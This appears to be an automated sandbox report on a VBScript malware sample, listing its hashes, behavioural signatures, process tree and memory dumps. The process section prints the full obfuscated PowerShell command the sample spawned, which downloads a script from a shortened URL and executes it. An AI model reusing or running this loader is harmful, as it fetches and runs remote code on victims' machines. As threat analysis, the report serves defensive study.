Analysis

max time kernel: 62s
max time network: 90s
platform: windows7_x64
resource: win7v20210408
submitted: 27-07-2021 16:25

Tasks:
- Static task: static1
- Behavioral task: behavioral1
  Sample: LKGFCV.vbs.vbs
  Resource: win7v20210408
  Platform: windows7_x64
- 0 signatures
- 0 seconds
General

Target: LKGFCV.vbs.vbs
Size: 730B
MD5: 8a7246cc77596aa840c15b3ac9907c4e
SHA1: c34f30b5aa3777cf3b3d35cfd8af330f8af97981
SHA256: c7be7d6e94c31e0f376d1cb9be3e0f311d57ae1a318437dc7c28b2574a73be31
SHA512: 790e62a08b098dcdda4dfc1cc218712f069426b639420aca7ae6dfbd239f765fe379b92847d12da8a8f68699068d1779e7415d1c76fa64a989ae9dfa8b7dbe94
Score: 8/10
Malware Config
Signatures

- Blocklisted process makes network request (1 IoCs)
  Processes (flow / pid / process): 7 / 1996 / powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process): 1996 / powershell.exe; 1996 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process): Token: SeDebugPrivilege / 1996 / powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description / pid / process / target process), 3 identical entries:
  PID 1036 wrote to memory of 1996 / 1036 / WScript.exe / powershell.exe
Processes

1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LKGFCV.vbs.vbs"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of process 1)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3BMLFhm'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1036-60-0x000007FEFB701000-0x000007FEFB703000-memory.dmp (Filesize 8KB)
- memory/1996-61-0x0000000000000000-mapping.dmp
- memory/1996-63-0x0000000002500000-0x0000000002501000-memory.dmp (Filesize 4KB)
- memory/1996-64-0x000000001AD20000-0x000000001AD21000-memory.dmp (Filesize 4KB)
- memory/1996-65-0x0000000001DD0000-0x0000000001DD1000-memory.dmp (Filesize 4KB)
- memory/1996-66-0x000000001ACA0000-0x000000001ACA2000-memory.dmp (Filesize 8KB)
- memory/1996-67-0x000000001ACA4000-0x000000001ACA6000-memory.dmp (Filesize 8KB)
- memory/1996-68-0x0000000001E80000-0x0000000001E81000-memory.dmp (Filesize 4KB)
- memory/1996-69-0x000000001A960000-0x000000001A961000-memory.dmp (Filesize 4KB)
- memory/1996-70-0x000000001A9F0000-0x000000001A9F1000-memory.dmp (Filesize 4KB)
- memory/1996-71-0x0000000001D40000-0x0000000001D41000-memory.dmp (Filesize 4KB)
- memory/1996-72-0x000000001ABC0000-0x000000001ABC1000-memory.dmp (Filesize 4KB)